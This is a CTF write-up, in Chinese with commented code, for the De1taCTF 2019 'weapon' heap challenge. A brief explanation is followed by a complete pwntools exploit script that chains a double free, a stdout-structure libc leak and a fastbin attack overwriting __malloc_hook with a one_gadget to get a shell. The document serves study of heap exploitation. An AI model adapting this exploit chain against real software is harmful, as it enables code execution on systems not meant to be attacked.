De1taCTF2019-weapon

届到了.jpg

虽然还是一知半解,但是至少知道了利用stdout leak的方法,掌握了一种无输出函数的leak方法。

同时还学到了利用scanf读入大量字符时,会申请一个0x400堆块,把已有的fastbin置入smallbin的操作,这样就可以在限制了分配大小的情况下 leak libc 了。

leak libc -> fastbin attack -> get shell

EXP(不知道为什么 leak 之后输出就变得和用封装函数时不一样了,只能手动写)

#coding=UTF-8
from pwn import *
from LibcSearcher import *
#context.log_level='debug'
# Candidate one_gadget offsets in the target libc.so.6 (the original comment only
# says "libc.so.6"); the script below uses onegadget[3].
onegadget = [
	0x45216,
	0x4526a,
	0xf02a4,
	0xf1147,
]
def create(size,idx,content):
	"""Menu option 1: answer the "weapon: " prompt with `size` and the "index: "
	prompt with `idx`, then send `content` raw (no newline appended) after the
	"input your name:\n" prompt.

	`size` is coerced with int() before being sent; `idx` is sent as str(idx).
	Talks to the module-level `sh` process.
	"""
	answers=(
		("choice >> ","1"),
		("weapon: ",str(int(size))),
		("index: ",str(idx)),
	)
	for prompt,reply in answers:
		sh.recvuntil(prompt)
		sh.sendline(reply)
	sh.recvuntil("input your name:\n")
	sh.send(content)
def rename(idx,content):
	"""Menu option 3: answer the "idx: " prompt with `idx` (coerced with int()),
	then send `content` raw (no newline appended) after the "content:\n" prompt.

	Talks to the module-level `sh` process.
	"""
	menu=[
		("choice >> ","3"),
		("idx: ",str(int(idx))),
	]
	for prompt,reply in menu:
		sh.recvuntil(prompt)
		sh.sendline(reply)
	sh.recvuntil("content:\n")
	sh.send(content)
def delete(idx):
	"""Menu option 2: answer the "idx :" prompt with str(idx).

	Note the prompt here is "idx :" (space before the colon), unlike rename()'s
	"idx: "; both strings are whatever the target binary prints, so they must
	stay byte-for-byte. Talks to the module-level `sh` process.
	"""
	slot=str(idx)
	for prompt,reply in (("choice >> ","2"),("idx :",slot)):
		sh.recvuntil(prompt)
		sh.sendline(reply)
libc=ELF('./pwn').libc  # libc the loader picks for ./pwn; only its __malloc_hook symbol is used below
# Retry loop. The run is probabilistic: the 2-byte partial write at idx 3 presumably only
# lands for some address layouts, and when the target dies the EOFError branch closes the
# process and starts over. (From a defender's view, the same service crashing and being
# restarted in a tight loop like this is itself a detection signal.)
while True:
	sh=process('./pwn')
	# Three 0x60-byte allocations, then free slots 0 and 1 (fastbin-sized per the summary above).
	create(0x60,0,"a")
	create(0x60,1,"a")
	create(0x60,2,"a")
	delete(0)
	delete(1)
	# Oversized menu answer (0x400 bytes of "1"): per the note above the listing, scanf then
	# allocates a 0x400 chunk and the freed fastbin chunks end up in smallbin, which is what
	# lets a 0x60-byte allocation later expose libc pointers.
	sh.recvuntil("choice >> ")
	sh.sendline("1"*0x400)
	# 2-byte partial overwrite ("\xdd\x25") of the reused chunk's first qword; the remaining
	# bytes are left to chance, which is what the outer loop retries -- presumably, confirm
	# against the original write-up.
	create(0x60,3,"\xdd\x25")
	create(0x60,4,'d')
	# Free 2 then 1 again (slot 1 was already freed above, i.e. a double free), then write a
	# single zero byte into slot 1 before taking two more 0x60-byte chunks.
	delete(2)
	delete(1)
	rename(1,'\x00')
	create(0x60,5,'a')
	create(0x60,6,'a')
	try:
		# The stdout leak named in the summary: 0x33 zero bytes, then 0xfbad1800, three zero
		# qwords and a single 0x08 byte. If the chunk landed where intended, the program's
		# next output contains libc pointers; if not, the target usually dies and the
		# EOFError branch below runs.
		create(0x60,7,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x08')		
	except EOFError:
		# Wrong guess: close this instance and start a fresh one.
		sh.close()
		continue	 	
	else:
		# Skip to just past the marker written above, then take 6 bytes and widen to a qword.
		sh.recvuntil(p64(0xfbad1800)+'\x00'*24)
		leak=u64(sh.recv(6)+'\x00\x00')
		# Fixed offset from the leaked pointer to __malloc_hook, written as two absolute
		# addresses from the author's debugging session (the difference is 0xaf8).
		mallochook=0x7f20568e1b10+leak-0x7f20568e2608
		log.success("malloc_hook: "+hex(mallochook))
		libcbase=mallochook-libc.symbols['__malloc_hook']
		log.success("libcbase: "+hex(libcbase))
		# From here the menu is driven by hand instead of via create()/rename(): the
		# recvuntil patterns omit the trailing "\n" (see the note above the listing --
		# the prompts read differently after the leak).
		# Allocate slot 7 ...
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(7))
		sh.recvuntil("input your name:")
		sh.send("content")
		delete(7)
		# ... free it, and overwrite its first qword with an address just below
		# __malloc_hook: the fastbin attack from the summary.
		sh.recvuntil("choice >> ")
		sh.sendline("3")
		sh.recvuntil("idx: ")
		sh.sendline(str(int(7)))
		sh.recvuntil("content:")
		sh.send(p64(mallochook-0x23))
		# Slot 8 takes chunk 7 back; slot 9 is then presumably served from mallochook-0x23.
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(8))
		sh.recvuntil("input your name:")
		sh.send("content")
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(9))
		sh.recvuntil("input your name:")
		# 19 bytes of padding, then the 4th one_gadget candidate (lands on __malloc_hook if
		# the chunk arithmetic above holds).
		sh.send('\x00'*19+p64(libcbase+onegadget[3]))
		# Double free of slot 0 -- presumably the error path this provokes is what ends up
		# calling the hook (the write-up doesn't say); TODO confirm.
		delete(0)
		delete(0)
		sh.interactive()
		break